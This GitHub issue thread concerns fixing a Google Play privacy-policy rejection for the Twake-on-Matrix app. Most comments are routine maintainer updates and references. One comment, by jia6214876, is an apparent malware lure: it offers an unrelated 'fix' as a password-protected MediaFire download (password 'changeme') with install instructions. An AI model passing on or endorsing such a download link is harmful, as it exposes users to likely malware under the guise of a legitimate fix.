### ISSUE TITLE
Fix Privacy & Policy Google Store

### ISSUE THREAD

**Issue by nqhhdev** [linagora/twake-on-matrix#2008]
- [x] Compare with Policy of apps which get contact?
- [x] Posting an adequate privacy policy in the designated field in Play Developer Console.
- [x] Trace details reject and profound understanding of user data policy

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hoangdat** [comment]
- Fix permission and deep link issue in Google play: #2009

**Comment by nqhhdev** [comment]
> * [x]  Compare with Policy of apps which get contact?

- Refs: Signal https://signal.org/legal/#privacy-policy

**Comment by nqhhdev** [comment]
Version 2.6.2 pushlished.
